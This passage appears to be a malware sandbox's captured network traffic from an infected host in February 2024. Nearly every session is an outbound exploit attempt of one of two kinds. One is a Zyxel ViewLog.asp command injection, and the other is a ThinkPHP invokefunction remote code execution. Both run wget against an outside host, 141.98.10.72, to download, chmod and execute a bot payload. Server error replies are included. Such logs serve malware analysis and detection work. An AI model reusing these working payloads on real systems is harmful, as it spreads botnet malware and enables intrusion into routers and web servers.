                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      230192.168.2.154022695.86.116.1968080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.315833092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      231192.168.2.153354295.210.96.5580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.411293983 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      232192.168.2.154421095.216.93.4980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.436193943 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:24.658027887 CET632INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                      Server: Apache/2.4.51 (Linux/SUSE)
                                                      Content-Length: 434
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 4c 69 6e 75 78 2f 53 55 53 45 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 65 2d 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.51 (Linux/SUSE) Server at www.ae-online.com Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      233192.168.2.154277462.28.117.318080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.494396925 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:24.707345009 CET410INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:29:23 GMT
                                                      Server: web
                                                      X-Frame-Options: SAMEORIGIN
                                                      Cache-Control: no-cache
                                                      Content-Length: 166
                                                      Content-Type: text/html
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60, max=99
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      234192.168.2.155352694.120.37.128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.560398102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      235192.168.2.154074662.29.40.1618080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.561873913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      236192.168.2.154691895.101.3.19180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.633960009 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:24.832004070 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:29:24 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 37 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 34 26 23 34 36 3b 39 62 61 36 65 37 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;77b0f748&#46;1707899364&#46;9ba6e72</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      237192.168.2.153521295.101.47.9180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.641128063 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:24.846277952 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:29:24 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 34 35 65 36 63 63 31 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 34 26 23 34 36 3b 34 63 32 30 61 64 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;845e6cc1&#46;1707899364&#46;4c20ad2</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      238192.168.2.153568095.216.240.14380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.661179066 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:24.886746883 CET435INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                      Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      239192.168.2.155853495.86.90.18080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.733603954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      240192.168.2.155265895.214.134.4880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.833034039 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:25.058795929 CET932INHTTP/1.1 400 Bad Request
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 681
                                                      date: Wed, 14 Feb 2024 08:29:23 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      241192.168.2.155876295.100.182.22480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.857767105 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:25.108834982 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:24 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 37 32 38 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 34 26 23 34 36 3b 32 35 38 31 62 39 32 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3728f748&#46;1707899364&#46;2581b922</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      242192.168.2.155959095.85.71.19180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.925955057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:25.240978003 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.20.1
                                                      Date: Wed, 14 Feb 2024 08:29:25 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      243192.168.2.1548300112.168.102.2980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:26.534410954 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:26.822865963 CET149INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 345
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:29:26 GMT
                                                      Server: WebServer
                                                      Feb 14, 2024 09:29:26.822901964 CET345INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      244192.168.2.1551780112.200.187.980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:27.149485111 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:27.486052036 CET35INHTTP/1.0 302 Redirect
                                                      Feb 14, 2024 09:29:27.486063004 CET44INData Raw: 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 36 3a 32 39 3a 32 39 20 32 30 32 34 0d 0a
                                                      Data Ascii: Date: Wed Feb 14 16:29:29 2024
